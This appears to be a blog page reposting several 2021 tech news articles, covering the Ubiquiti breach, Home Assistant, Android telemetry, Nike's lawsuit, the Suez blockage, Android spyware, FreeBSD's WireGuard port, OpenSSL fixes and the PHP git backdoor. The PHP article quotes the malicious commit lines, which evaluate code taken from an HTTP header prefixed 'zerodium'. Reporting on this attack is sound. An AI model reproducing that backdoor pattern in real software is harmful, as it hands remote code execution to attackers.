inchblog

one all world

Ubiquiti breach puts countless cloud-based devices at risk of takeover — 2021年3月31日

Ubiquiti breach puts countless cloud-based devices at risk of takeover

Stylized image of rows of padlocks.

Network devices maker Ubiquiti has been covering up the severity of a data breach that puts customers’ hardware at risk of unauthorized access, KrebsOnSecurity has reported, citing an unnamed whistleblower inside the company.

In January, the maker of routers, Internet-connected cameras, and other networked devices, disclosed what it said was “unauthorized access to certain of our information technology systems hosted by a third-party cloud provider.” The notice said that, while there was no evidence the intruders accessed user data, the company couldn’t rule out the possibility that they obtained users’ names, email addresses, cryptographically hashed passwords, addresses, and phone numbers. Ubiquiti recommended users change their passwords and enable two-factor authentication.

Device passwords stored in the cloud

Tuesday’s report from KrebsOnSecurity cited a security professional at Ubiquiti who helped the company respond to the two-month breach beginning in December 2020. The individual said the breach was much worse than Ubiquiti let on and that executives were minimizing the severity to protect the company’s stock price.

The breach comes as Ubiquiti is pushing—if not outright requiring—cloud-based accounts for users to set up and administer devices running newer firmware versions. An article here says that during the initial setup of a UniFi Dream Machine (a popular router and home gateway appliance), users will be prompted to log in to their cloud-based account or, if they don’t already have one, to create an account.

“You’ll use this username and password to log in locally to the UniFi Network Controller hosted on the UDM, the UDM’s Management Settings UI, or via the UniFi Network Portal (https://network.unifi.ui.com) for Remote Access,” the article goes on to explain. Ubiquiti customers complain about the requirement and the risk it poses to the security of their devices in this thread that followed January’s disclosure.

Forging authentication cookies

According to Adam, the fictitious name that Brian Krebs of KrebsOnSecurity gave the whistleblower, the data that was accessed was much more extensive and sensitive than Ubiquiti portrayed. Krebs wrote:

In reality, Adam said, the attackers had gained administrative access to Ubiquiti’s servers at Amazon’s cloud service, which secures the underlying server hardware and software but requires the cloud tenant (client) to secure access to any data stored there.

“They were able to get cryptographic secrets for single sign-on cookies and remote access, full source code control contents, and signing keys exfiltration,” Adam said.

Adam says the attacker(s) had access to privileged credentials that were previously stored in the LastPass account of a Ubiquiti IT employee, and gained root administrator access to all Ubiquiti AWS accounts, including all S3 data buckets, all application logs, all databases, all user database credentials, and secrets required to forge single sign-on (SSO) cookies.

Such access could have allowed the intruders to remotely authenticate to countless Ubiquiti cloud-based devices around the world. According to its website, Ubiquiti has shipped more than 85 million devices that play a key role in networking infrastructure in over 200 countries and territories worldwide.

Ars Senior Technology Editor Lee Hutchinson reviewed Ubiquiti’s UniFi line of wireless devices in 2015 and again three years later.

In a statement issued after this post went live, Ubiquiti said “nothing has changed with respect to our analysis of customer data and the security of our products since our notification on January 11.” The full statement is:

As we informed you on January 11, we were the victim of a cybersecurity incident that involved unauthorized access to our IT systems. Given the reporting by Brian Krebs, there is newfound interest and attention in this matter, and we would like to provide our community with more information.

At the outset, please note that nothing has changed with respect to our analysis of customer data and the security of our products since our notification on January 11. In response to this incident, we leveraged external incident response experts to conduct a thorough investigation to ensure the attacker was locked out of our systems.

These experts identified no evidence that customer information was accessed, or even targeted. The attacker, who unsuccessfully attempted to extort the company by threatening to release stolen source code and specific IT credentials, never claimed to have accessed any customer information. This, along with other evidence, is why we believe that customer data was not the target of, or otherwise accessed in connection with, the incident.

At this point, we have well-developed evidence that the perpetrator is an individual with intricate knowledge of our cloud infrastructure. As we are cooperating with law enforcement in an ongoing investigation, we cannot comment further.

All this said, as a precaution, we still encourage you to change your password if you have not already done so, including on any website where you use the same user ID or password. We also encourage you to enable two-factor authentication on your Ubiquiti accounts if you have not already done so.

At a minimum, people using Ubiquiti devices should change their passwords and enable two-factor-authentication if they haven’t already done so. Given the possibility that intruders into Ubiquiti’s network obtained secrets for single sign-on cookies for remote access and signing keys, it’s also a good idea to delete any profiles associated with a device, make sure the device is using the latest firmware, and then recreate profiles with new credentials. As always, remote access should be disabled unless it’s truly needed and is turned on by an experienced user.

Post updated to add comment from Ubiquiti.

How to achieve smart home nirvana (or, home automation without subscription) —

How to achieve smart home nirvana (or, home automation without subscription)

What comes to mind when you think of a smart home? Wi-Fi enabled light bulbs, video doorbells, cloud-connected robot vacuums, or smart fridges perhaps? Brands like Google/Nest or everything enabled with Amazon’s Alexa? While often providing some genuine convenience, these devices are also usually designed to invite and lock users into manufacturers’ ecosystems. Create a cool piece of hardware, you’ll make one sale. Create a cool piece of hardware that extracts recurring monthly service fees for cloud storage or to unlock extra functionality, and you’ll have sales for life.

Compounding our collective frustration, these ecosystems are often incompatible with each other and require multiple different apps for control. Not only are subscriptions and upselling part of the game, the underlying business models for these products are built around planned obsolescence and mining user data.

Luckily, aspirational smart home folks in 2021 have at least one viable alternative: Home Assistant. This piece of open source software is the proverbial ring “that in the darkness binds them.” It is the glue for smart home gear spanning all sorts of manufacturers, from behemoths like Google to minnows like Shelly. It’s a project that has set out to change all of the smart home pitfalls listed above by putting local control, privacy, and interoperability first.

An example of a Home Assistant dashboard used to monitor an RV.
Enlarge / An example of a Home Assistant dashboard used to monitor an RV.

By acting as a single configuration point for multiple ecosystems, Home Assistant is in a uniquely powerful place in the modern smart home. It is aware of the state of every entity in your home and can therefore do useful things like close the garage door if you left it open when you went to bed or left your defined home zone. I will never tire of having the lights automatically fade up one hour before sunset either.

If this sounds too good to be true—all the benefits of a smart home without the downside associated with off-the-shelf solutions—today is the day to see for yourself. Let’s walk through the building blocks required to put together your own self-hosted, subscription-free home automation system. Using the Home Assistant project as a foundation, we’ll cover some must haves for new tech, highlight some of our favorite open source home automation projects, and give you a quick primer on how to put all of it together.

Home Assistant, the basics

Considering the title of this article, this note is a bit awkward. But when you initially choose to build out your smart home with the Home Assistant project, there is an optional $5 per month subscription. This is administered by the company behind the project, Nabu Casa, which was founded in 2018 to ensure the Home Assistant project remained sustainable. For the company, these fees allow Nabu Casa to pay a small number of staff. For you, the $5 per month fee enables your local Home Assistant instance to effortlessly work with popular cloud services like Google Home or Amazon Alexa, and it also permits access to Home Assistant from anywhere with minimal setup. That said, it is definitely possible to mirror both of these functions without the subscription by using a reverse proxy, if you like.

While there are other choices in this space such as Domoticz, OpenHAB, or Gladys, Home Assistant will be our focus today because it’s free, open, and has a *huge* community behind it. At the time of writing, it has over 1,700 integrations with all manner of devices, services, and hardware supported. Plus, it’s a regular feature of Github’s trending page, too.

Versatility is the true magic of Home Assistant. In effect, it speaks 1,700 different languages and brings them all into one place. Build a smart home ecosystem with Home Assistant at its core, and devices from completely different ecosystems can finally talk to each other. Would you like the lights to automatically turn off when you turn the kettle on? With Home Assistant, you can do that!

Let’s look at a more realistic example of a useful automation based on this principle. Say you have two sets of lights on totally different circuits that you always want to be in sync, perhaps downstairs and upstairs hallway lighting. With Home Assistant monitoring the state of these entities, it can react and do things automatically. In other words, if light1 is on, then turn on light2.

Time for some key terminology: Home Assistant performs such actions when certain conditions are met or triggers occur. This allows the construction of complex logic such as “turn down the thermostat, ensure doors are locked, and all lights are off when the sun is below the horizon and no motion is detected for one hour or guest mode is not enabled.” Consider how many apps you’d have to open to do all that by yourself: an app for the thermostat, a smart lock, and motion detection via a camera or sensor at least.

Without some Home Assistant glue in the middle, most home devices aren’t really “smart” or “connected.” They are remotely controllable, which is an important prerequisite for being automated, but that should not be conflated with automation.

Automation is your house reacting to the time of day, the weather, your presence, and so on without need to manually activate the devices every time. With Home Assistant flexing all its muscles, in theory it’s possible to build a home where you shouldn’t need to touch a light switch or a thermostat because your automations are created with enough care and thought.

Android sends 20x more data to Google than iOS sends to Apple, study says — 2021年3月30日

Android sends 20x more data to Google than iOS sends to Apple, study says

A woman under a thick blanket looks at her smartphone.
Enlarge / Insomnia people and mobile-addiction concepts.

This post has been updated to report objections researcher Doug Leith had to Google’s critique of his research.

Whether you have an iPhone or an Android device, it’s continuously sending data including your location, phone number, and local network details to Apple or Google. Now, a researcher has provided a side-by-side comparison that suggests that, while both iOS and Android collect handset data around the clock—even when devices are idle, just out of the box, or after users have opted out—the Google mobile OS collects about 20 times as much data as its Apple competitor.

Both iOS and Android, researcher Douglas Leith from Trinity College in Ireland said, transmit telemetry data to their motherships even when a user hasn’t logged in or has explicitly configured privacy settings to opt out of such collection. Both OSes also send data to Apple and Google when a user does simple things such as inserting a SIM card or browsing the handset settings screen. Even when idle, each device connects to its back-end server on average every 4.5 minutes.

Apps and more

It wasn’t just the OSes that sent data to Apple or Google. Pre-installed apps or services also made network connections, even when they hadn’t been opened or used. Whereas iOS automatically sent Apple data from Siri, Safari, and iCloud, Android collected data from Chrome, YouTube, Google Docs, Safetyhub, Google Messenger, the device clock, and the Google search bar.

The table below shows a summary of handset data sent to Apple or Google when the user isn’t logged in:

Douglas Leith

Where Android stands out, Leith said, is in the amount of data it collects. At startup, an Android device sends Google about 1MB of data, compared with iOS sending Apple around 42KB. When idle, Android sends roughly 1MB of data to Google every 12 hours, compared with iOS sending Apple about 52KB over the same period. In the US alone, Android collectively gathers about 1.3TB of data every 12 hours. During the same period, iOS collects about 5.8GB.

Google disagrees

Google has contested the findings, saying that they’re based on faulty methods for measuring the data that’s collected by each OS. The company also contended that data collection is a core function of any Internet-connected device.

In a statement, a spokesperson wrote:

We identified flaws in the researcher’s methodology for measuring data volume and disagree with the paper’s claims that an Android device shares 20 times more data than an iPhone. According to our research, these findings are off by an order of magnitude, and we shared our methodology concerns with the researcher before publication.

This research largely outlines how smartphones work. Modern cars regularly send basic data about vehicle components, their safety status and service schedules to car manufacturers, and mobile phones work in very similar ways. This report details those communications, which help ensure that iOS or Android software is up to date, services are working as intended, and that the phone is secure and running efficiently.

On background (meaning Ars isn’t permitted to name or quote the spokesperson), the representative said that it’s inaccurate to say that a user can opt out of all telemetry data collection by the Google OS. The Android Usage and Diagnostics checkbox doesn’t cover telemetry data that Google considers essential for the device to operate normally. Telemetry information collected by the Device Configuration service, for instance, is required for updating and patching the OS.

The spokesperson also challenged the methods the researcher used to measure the amount of data collected by iOS. The experimental setup they used didn’t capture certain types of data, such as UDP/QUIC traffic, which is commonly transmitted by smartphones.

In an email sent after this post went live, Leith said the response “does not accurately characterise the interactions that I’ve had with Google” and in his view was “positively misleading.” He said he contacted Google to ask for a correction. On Friday, the Google spokesperson said the company had no plans to retract the statement. The spokesperson added that the company thinks the majority of Leith’s research is accurate.

An Apple spokesperson also spoke on the condition it be background. The spokesperson said that Apple provides transparency and control for personal information it collects, that the report gets things wrong, that Apple offers privacy protections that prevent Apple from tracking user locations, and that Apple informs users about the collection of location-related data.

Round-the-clock collection

Leith performed his measurements using a Google Pixel 2 running Android 10 and an iPhone 8 running iOS 13.6.1. The iPhone was jailbroken using the Checm8 exploit. The Pixel had Google Play services enabled.

In all, the study, available here, measured the amount of data the devices collected:

  • on first startup following a factory reset
  • when a SIM was inserted or removed
  • when a handset was idle
  • when the settings screen was viewed
  • when location was enabled or disabled
  • when the user logged in to the pre-installed app store

Leith said the data collection by both OSes is concerning because it’s readily linked to a user’s name, email address, payment card data, and possibly to other devices the user has. What’s more, the constant connections to back-end servers necessarily reveals the IP address of the device and, by extension, the general geographic location of the user.

“Currently there are few, if any, realistic options for preventing this data sharing,” Leith wrote.

Post updated to add comment from Apple and later to add follow-up reaction from the researcher and Google.

Nike sues over “Satan Shoe,” disavowing all connection to soul soles —

Nike sues over “Satan Shoe,” disavowing all connection to soul soles

Promotional image shoes a man with demonic eyes holding a customized sneaker.
Enlarge / The shoes—and the marketing for them—are definitely committed to their aesthetic.

Nike is suing the company behind a viral, limited-edition custom shoe, arguing that the unauthorized custom work dilutes its brand and creates a false impression that Nike approves the controversial design.

The Satan Shoe, a collaboration between a company called MSCHF and rapper Lil Nas X, is a tie-in to the rapper’s new single, “Montero (Call Me By Your Name),” released last Friday. The music video for the song (contains explicit language and extremely unambiguous sexual imagery; do not watch at work or around small children) tells a story “of sin, banishment, and redemption” that ends with Lil Nas X descending into Hell, giving Satan the lap dance of a lifetime, then deposing him and claiming the devil’s horns for his own.

“Montero” proved to be an immediate viral sensation; in five days, it has racked up about 45 million YouTube views, and the song, the singer, and various related terms (“Satan,” “mark of the beast,” “devil,” etc.) have been trending on Twitter and other platforms nonstop for days.

The Satan Shoes differ from the original Nike Air Max 97 shoe due to the addition of a bronze pentagram on the laces, the number “666” and the phrase “Luke 10:18” embroidered on the side, “Lil Nas X” embroidered on the back, a red inverted cross on the top of the tongue, and a mixture of 60 cc of red ink and one drop of human blood injected into the bubble of the sole. MSCHF made only 666 pairs of the shoes, which (despite costing $1,018 each) sold out in minutes.

Nike argues in its suit (PDF) that it had nothing to do with these shoes, but MSCHF has created brand confusion leading customers to think Nike is somehow involved. “Nike files this lawsuit to maintain control of its brand, to protect its intellectual property, and to clear the confusion and dilution in the marketplace by setting the record straight,” the suit reads. “Nike has not and does not approve or authorize MSCHF’s customized Satan Shoes.” The company asks the court to stop MSCHF from fulfilling any orders for the shoes.

How is this shoe different from any other shoe?

People sell customized sneakers all the time. The Internet is chock-full of individual sellers slinging custom Nikes, as well as any number of websites specializing in them.

US law, broadly speaking, tends to be pretty forgiving of doing whatever the hell you want with a thing after you have legally purchased that thing. In intellectual property law, there’s a legal principle called the first-sale doctrine. At a high level, the first-sale doctrine basically means that someone loses their intellectual property rights over what is done with a thing they have sold at the time they sell it and that the new owner then gets to decide what to do with it. There are, of course, exceptions, but generally if I spend my own money legally to acquire something—a book, a shoe, a designer bag—I can modify it however I want and then sell it to whomever I want for whatever price that person is willing to pay. There is a similar principle, called patent exhaustion, that applies to goods that are patented rather than copyrighted.

Nike, however, is specifically alleging brand confusion and trademark infringement. In short, the company says its swoop (sorry, “SWOOP”) is world-famous, and by leaving it on the shoe, MSCHF is deliberately confusing consumers into thinking Nike has something to do with the product. “MSCHF’s wrongful use of the Nike Asserted Marks is likely to cause dilution by blurring and the whittling away of the distinctiveness and fame” of Nike’s visual trademarks, the suit argues. “Unless restrained, MSCHF will continue to use the Nike Asserted Marks and/or confusingly similar marks and will cause irreparable damage to Nike for which Nike has no adequate remedy” other than the lawsuit.

Nike is clearly right that the Satan Shoes and associated video are deliberately and intentionally provocative, and they are indeed drawing predictable ire from certain conservative Christian corners. South Dakota Gov. Kristi Noem, for example, shared the Twitter announcement of the Satan Shoe with the caption, “We are in a fight for the soul of our nation. We need to fight hard. And we need to fight smart. We have to win.”

The suit includes several online comments from consumers claiming they are going to boycott Nike over the Satan Shoe. “Words cannot describe the amount of disgust and disbelieve that this is truly happening,” one user going by “Michelle” wrote. “Jesus please save us!!!! Never supporting or buying Nike again!!!!”

“Nike has no control over the nature and quality of the Satan Shoes,” the company concludes, “and MSCHF’s keeping the Nike name on them is reflecting negatively on the company, its reputations, and the quality and safety of its goods.”

Huge success

Whether or not a single pair of shoes gets into the hands of any buyer now seems to be beside the point; clearly MSCHF has gotten all the attention it could possibly desire.

Brooklyn-based MSCHF—i.e., mischief—specializes in viral absurdity. That’s its entire jam, company CEO Gabriel Whaley recently explained to Business Insider.

“We’re trying to do stuff that the world can’t even define,” Whaley said. “Our perspective is everything is funny in a nihilistic sort of way. We’re not here to make the world a better place… We just do shit, and people buy our stuff.”

Lil Nas X himself is likewise clearly enjoying and leaning into the controversy online, as he is known to do. Over the weekend he posted a YouTube video called “Lil Nas X Apologizes for Satan Shoe,” in which he briefly holds up a shoe before the video cuts to the sex-with-Satan part of the “Montero” video.

The singer also posted a Tweet late Sunday with a mock-up of a white version of the Nike shoe, featuring Chick-fil-A branding in place of the iconic swoop and an allusion to John 3:16. “[W]e have decided to drop these to even the score,” he wrote. “[D]amn y’all happy now?”

Hackers backdoor PHP source code after breaching internal git server — 2021年3月29日

Hackers backdoor PHP source code after breaching internal git server

A cartoon door leads to a wall of computer code.

A hacker compromised the server used to distribute the PHP programming language and added a backdoor to source code that would have made websites vulnerable to complete takeover, members of the open source project said.

Two updates pushed to the PHP Git server over the weekend added a line that, if run by a PHP-powered website, would have allowed visitors with no authorization to execute code of their choice. The malicious commits here and here gave the code the code-injection capability to visitors who had the word “zerodium” in an HTTP header.

PHP.net hacked, code backdoored

The commits were made to the php-src repo under the account names of two well-known PHP developers, Rasmus Lerdorf and Nikita Popov. “We don’t yet know how exactly this happened, but everything points toward a compromise of the git.php.net server (rather than a compromise of an individual git account),” Popov wrote in a notice published on Sunday night.

In the aftermath of the compromise, Popov said that PHP maintainers have concluded that their standalone Git infrastructure is an unnecessary security risk. As a result, they will discontinue the git.php.net server and make GitHub the official source for PHP repositories. Going forward, all PHP source code changes will be made directly to GitHub rather than to git.php.net.

The malicious changes came to public attention no later than Sunday night by developers including Markus Staab, Jake Birchallf, and Michael Voříšek as they scrutinized a commit made on Saturday. The update, which purported to fix a typo, was made under an account that used Lerdorf’s name. Shortly after the first discovery, Voříšek spotted the second malicious commit, which was made under Popov’s account name. It purported to revert the previous typo fix.

Both commits added the same lines of code:

onvert_to_string(enc);
	if (strstr(Z_STRVAL_P(enc), "zerodium")) {
		zend_try {
			zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

Zerodium is a broker that buys exploits from researchers and sells them to government agencies for use in investigations or other purposes. Why the commits referenced Zerodium is not clear. The company’s CEO, Chaouki Bekrar, said on Twitter Monday that Zerodium wasn’t involved.

“Cheers to the troll who put ‘Zerodium’ in today’s PHP git compromised commits,” he wrote. “Obviously, we have nothing to do with this. Likely, the researcher(s) who found this bug/exploit tried to sell it to many entities but none wanted to buy this crap, so they burned it for fun.

Bad karma

Prior to the compromise, The PHP Group handled all write access to the repository on their own git server http://git.php.net/ using what Popov called a “home-grown” system called Karma. It provided developers different levels of access privileges depending on previous contributions. GitHub, meanwhile, had been a mirror repository.

Now, the PHP Group is abandoning the self-hosted and managed git infrastructure and replacing it with GitHub. The change means that GitHub is now the “canonical” repository. The PHP Group will no longer use the Karma system. Instead, contributors will have to be part of the PHP organization on GitHub and must use two-factor authentication for accounts with the ability to make commits.

This weekend’s event isn’t the first time php.net servers have been breached with the intent of performing a supply chain attack. In early 2019, the widely used PHP Extension and Application Repository temporarily shut down most of the site after discovering that hackers replaced the main package manager with a malicious one. Group developers said that anyone who had downloaded the package manager in the past six months should get a new copy.

PHP runs an estimated 80 percent of websites. There are no reports of websites incorporating the malicious changes into their production environments.

The changes were likely made by people who wanted brag about their unauthorized access to the PHP Git server rather than those trying to actually backdoor websites that use PHP, said HD Moore, co-founder and CEO of network discovery platform Rumble.

“Sounds like the attackers are trolling Zerodium or trying to give the impression that the code was backdoored for much longer,” he told Ars. “Either way, I would be spending a lot of time going through previous commits if I had any security interest in PHP.”

The massive cargo ship that blocked the Suez Canal is now moving again —

The massive cargo ship that blocked the Suez Canal is now moving again

After nearly a week of blocking one of the world’s most important maritime shortcuts, the massive Ever Given cargo ship is now free and on the move. “I am excited to announce that our team of experts, working in close collaboration with the Suez Canal Authority, successfully refloated the Ever Given on 29 March at 15:05 hrs local time, thereby making free passage through the Suez Canal possible again,” said Peter Berdowski, CEO of the salvage company Boskalis.

Owned by shipping company Evergreen, the 400-meter-long Ever Given is one of the longest ships ever built, dwarfing even the biggest nuclear aircraft carriers. The ship was caught in a storm on March 23 while transiting the Suez Canal, where a combination of high winds and the ship’s massive sail area turned it diagonally. At that point, the Ever Given ran aground and completely blocked the 152-year-old canal, which is less than a meter deep in many places outside of a dredged navigation channel.

The blockage—easily seen by space-based sensors—then started holding up hundreds of other ships trying to transit between the Red Sea and the Mediterranean.

For several days, workers on the ground in Egypt had tried to free the Ever Given from the bank of the canal, digging out the ship’s large, bulbous prow from the sand. Over the weekend, dredgers also went to work on the narrow section of the canal (under the front half of the Ever Given), moving tens of thousands of tons of mud in an attempt to free the big boat from its bondage.

Finally, on Monday, a combination of at least 14 tug boats and a high tide started making real progress, refloating the Ever Given and then, eventually, getting it moving again.

New Android malware with full range of spying capabilities has been found — 2021年3月26日

New Android malware with full range of spying capabilities has been found

New Android malware with full range of spying capabilities has been found
Getty Images

Researchers have discovered a new advanced piece of Android malware that finds sensitive information stored on infected devices and sends it to attacker-controlled servers.

The app disguises itself as a system update that must be downloaded from a third-party store, researchers from security firm Zimperium said on Friday. In fact, it’s a remote-access trojan that receives and executes commands from a command-and-control server. It provides a full-featured spying platform that performs a wide range of malicious activities.

Soup to nuts

Zimperium listed the following capabilities:

  • Stealing instant messenger messages
  • Stealing instant messenger database files (if root is available)
  • Inspecting the default browser’s bookmarks and searches
  • Inspecting the bookmark and search history from Google Chrome, Mozilla Firefox, and Samsung Internet Browser
  • Searching for files with specific extensions (including .pdf, .doc, .docx, and .xls, .xlsx)
  • Inspecting the clipboard data
  • Inspecting the content of the notifications
  • Recording audio
  • Recording phone calls
  • Periodically take pictures (either through the front or back cameras)
  • Listing of the installed applications
  • Stealing images and videos
  • Monitoring the GPS location
  • Stealing SMS messages
  • Stealing phone contacts
  • Stealing call logs
  • Exfiltrating device information (e.g., installed applications, device name, storage stats)
  • Concealing its presence by hiding the icon from the device’s drawer/menu

Messaging apps that are vulnerable to the database theft include WhatsApp, which billions of people use, often with the expectation that it provides greater confidentiality than other messengers. As noted, the databases can be accessed only if the malware has root access to the infected device. Hackers are able to root infected devices when they run older versions of Android.

If the malicious app doesn’t acquire root, it can still collect conversations and message details from WhatsApp by tricking users into enabling Android accessibility services. Accessibility services are controls built into the OS that make it easier for users with vision impairments or other disabilities to use devices by, for instance, modifying the display or having the device provide spoken feedback. Once accessibility services are enabled, the malicious app can scrape the content on the WhatsApp screen.

Another capability is stealing files stored in a device’s external storage. To reduce bandwidth consumption that could tip off a victim that a device is infected, the malicious app steals image thumbnails, which are much smaller than the images they correspond to. When a device is connected to Wi-Fi, the malware sends stolen data from all folders to the attackers. When only a mobile connection is available, the malware sends a more limited set of data.

As full-featured as the spying platform is, it suffers from a key limitation—namely, the inability to infect devices without first tricking users into making decisions that more experienced people know aren’t safe. First, users must download the app from a third-party source. As problematic as Google’s Play Store is, it’s generally a more trustworthy place to get apps. Users must also be social engineered into enabling accessibility services for some of the advanced features to work.

Google declined to comment except to reiterate that the malware was never available in Play.

Buffer overruns, license violations, and bad code: FreeBSD 13’s close call —

Buffer overruns, license violations, and bad code: FreeBSD 13’s close call

FreeBSD's core development team, for the most part, does not appear to see the need to update their review and approval procedures.
Enlarge / FreeBSD’s core development team, for the most part, does not appear to see the need to update their review and approval procedures.
Aurich Lawson (after KC Green)

At first glance, Matthew Macy seemed like a perfectly reasonable choice to port WireGuard into the FreeBSD kernel. WireGuard is an encrypted point-to-point tunneling protocol, part of what most people think of as a “VPN.” FreeBSD is a Unix-like operating system that powers everything from Cisco and Juniper routers to Netflix’s network stack, and Macy had plenty of experience on its dev team, including work on multiple network drivers.

So when Jim Thompson, the CEO of Netgate, which makes FreeBSD-powered routers, decided it was time for FreeBSD to enjoy the same level of in-kernel WireGuard support that Linux does, he reached out to offer Macy a contract. Macy would port WireGuard into the FreeBSD kernel, where Netgate could then use it in the company’s popular pfSense router distribution. The contract was offered without deadlines or milestones; Macy was simply to get the job done on his own schedule.

With Macy’s level of experience—with kernel coding and network stacks in particular—the project looked like a slam dunk. But things went awry almost immediately. WireGuard founding developer Jason Donenfeld didn’t hear about the project until it surfaced on a FreeBSD mailing list, and Macy didn’t seem interested in Donenfeld’s assistance when offered. After roughly nine months of part-time development, Macy committed his port—largely unreviewed and inadequately tested—directly into the HEAD section of FreeBSD’s code repository, where it was scheduled for incorporation into FreeBSD 13.0-RELEASE.

This unexpected commit raised the stakes for Donenfeld, whose project would ultimately be judged on the quality of any production release under the WireGuard name. Donenfeld identified numerous problems with Macy’s code, but rather than object to the port’s release, Donenfeld decided to fix the issues. He collaborated with FreeBSD developer Kyle Evans and with Matt Dunwoodie, an OpenBSD developer who had worked on WireGuard for that operating system. The three replaced almost all of Macy’s code in a mad week-long sprint.

This went over very poorly with Netgate, which sponsored Macy’s work. Netgate had already taken Macy’s beta code from a FreeBSD 13 release candidate and placed it into production in pfSense’s 2.5.0 release. The forklift upgrade performed by Donenfeld and collaborators—along with Donenfeld’s sharp characterization of Macy’s code—presented the company with a serious PR problem.

Netgate’s public response included accusations of “irrational bias against mmacy and Netgate” and irresponsible disclosure of “a number of zero-day exploits”—despite Netgate’s near-simultaneous declaration that no actual vulnerabilities existed.

This combative response from Netgate raised increased scrutiny from many sources, which uncovered surprising elements of Macy’s own past. He and his wife Nicole had been arrested in 2008 after two years spent attempting to illegally evict tenants from a small San Francisco apartment building the pair had bought.

The Macys’ attempts to force their tenants out included sawing through floor support joists to make the building unfit for human habitation, sawing holes directly through the floors of tenants’ apartments, and forging extremely threatening emails appearing to be from the tenants themselves. The couple fled to Italy to avoid prosecution but were eventually extradited back to the US—where they pled guilty to a reduced set of felonies and served four years and four months each.

Macy’s history as a landlord, unsurprisingly, dogged him professionally—which contributed to his own lack of attention to the doomed WireGuard port.

“I didn’t even want to do this work,” Macy eventually told us. “I was burned out, spent many months with post-COVID syndrome… I’d suffered through years of verbal abuse from non-doers and semi-non-doers in the project whose one big one up on me is that they aren’t felons. I jumped at the opportunity to leave the project in December… I just felt a moral obligation to get [the WireGuard port] over the finish line. So you’ll have to forgive me if my final efforts were a bit half-hearted.”

This admission answers why such an experienced, qualified developer might produce inferior code—but it raises much larger questions about process and procedure within the FreeBSD core committee itself.

How did so much sub-par code make it so far into a major open source operating system? Where was the code review which should have stopped it? And why did both the FreeBSD core team and Netgate seem more focused on the fact that the code was being disparaged than its actual quality?

Code quality

The first issue is whether Macy’s code actually had significant problems. Donenfeld said that it did, and he identified a number of major issues:

  • Sleep to mitigate race conditions
  • Validation functions which simply return true
  • Catastrophic cryptographic vulnerabilities
  • Pieces of the wg protocol left unimplemented
  • Kernel panics
  • Security bypasses
  • Printf statements deep in crypto code
  • “Spectacular” buffer overflows
  • Mazes of Linux→FreeBSD ifdefs

But Netgate argued that Donenfeld had gone overboard with his negative assessment. The original Macy code, they argued, was simply not that bad.

Despite not having any kernel developers on-staff, Ars was able to verify at least some of Donenfeld’s claims directly, quickly, and without external assistance. For instance, finding a validation function which simply returned true—and printf statements buried deep in cryptographic loops—required nothing more complicated than grep.

Empty validation function

In order to confirm or deny the claim of an empty validation function—one which always “returns true” rather than actually validating the data passed to it—we searched for instances of return true or return (true) in Macy’s if_wg code, as checked into FreeBSD 13.0-HEAD.

root@banshee:~/macy-freebsd-wg/sys/dev/if_wg# grep -ir 'return.*true' . | wc -l
21

This is a small enough number of returns to easily hand-audit, so we then used grep to find the same data but with three lines of code coming immediately before and after each return true:

root@banshee:~/macy-freebsd-wg/sys/dev/if_wg# grep -ir -A3 -B3 'return.*true' .

Among the valid uses of return true, we discovered one empty validation function, in module/module.c:

wg_allowedip_valid(const struct wg_allowedip *wip)
{

 return (true);
}

It’s probably worth mentioning that this empty validation function is not buried at the bottom of a sprawling mass of code—module.c as written is only 863 total lines of code.

We did not attempt to chase down the use of this function any further, but it appears to be intended to check whether a packet’s source and/or destination belongs to WireGuard’s allowed-ips list, which determines what packets may be routed down a given WireGuard tunnel.

OpenSSL fixes high-severity flaw that allows hackers to crash servers — 2021年3月25日

OpenSSL fixes high-severity flaw that allows hackers to crash servers

Stylized image of a floating padlock.

OpenSSL, the most widely used software library for implementing website and email encryption, has patched a high-severity vulnerability that makes it easy for hackers to completely shut down huge numbers of servers.

OpenSSL provides time-tested cryptographic functions that implement the Transport Layer Security protocol, the successor to Secure Sockets Layer that encrypts data flowing between Internet servers and end-user clients. People developing applications that use TLS rely on OpenSSL to save time and avoid programming errors that are common when noncryptographers build applications that use complex encryption.

The crucial role OpenSSL plays in Internet security came into full view in 2014 when hackers began exploiting a critical vulnerability in the open source code library that let them steal encryption keys, customer information, and other sensitive data from servers all over the world. Heartbleed, as the security flaw was called, demonstrated how a couple lines of faulty code could topple the security of banks, news sites, law firms, and more.

Denial-of-service bug squashed

On Thursday, OpenSSL maintainers disclosed and patched a vulnerability that causes servers to crash when they receive a maliciously crafted request from an unauthenticated end user. CVE-2021-3449, as the denial-of-server vulnerability is tracked, is the result of a null pointer dereference bug. Cryptographic engineer Filippo Valsorda said on Twitter that the flaw could probably have been discovered earlier than now.

“Anyway, sounds like you can crash most OpenSSL servers on the Internet today,” he added.

Hackers can exploit the vulnerability by sending a server a maliciously formed renegotiating request during the initial handshake that establishes a secure connection between an end user and a server.

“An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client,” maintainers wrote in an advisory. “If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack.”

The maintainers have rated the severity high. Researchers reported the vulnerability to OpenSSL on March 17. Nokia developers Peter Kästle and Samuel Sapalski provided the fix.

Certificate verification bypass

OpenSSL also fixed a separate vulnerability that, in edge cases, prevented apps from detecting and rejecting TLS certificates that aren’t digitally signed by a browser-trusted certificate authority. The vulnerability, tracked as CVE-2021-3450, involves the interplay between a X509_V_FLAG_X509_STRICT flag found in the code and several parameters.

Thursday’s advisory explained:

If a “purpose” has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named “purpose” values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application.

In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose.

OpenSSL versions 1.1.1h and newer are vulnerable. OpenSSL 1.0.2 is not impacted by this issue. Akamai researchers Xiang Ding and Benjamin Kaduk discovered and reported the bug, respectively. It was patched by Tomáš Mráz, a software developer who contracts with OpenSSL Software Services.

Apps that use a vulnerable OpenSSL version should upgrade to OpenSSL 1.1.1k as soon as possible.

Weebly vs. Squarespace: How these top website builders really stack up against each other —

Weebly vs. Squarespace: How these top website builders really stack up against each other

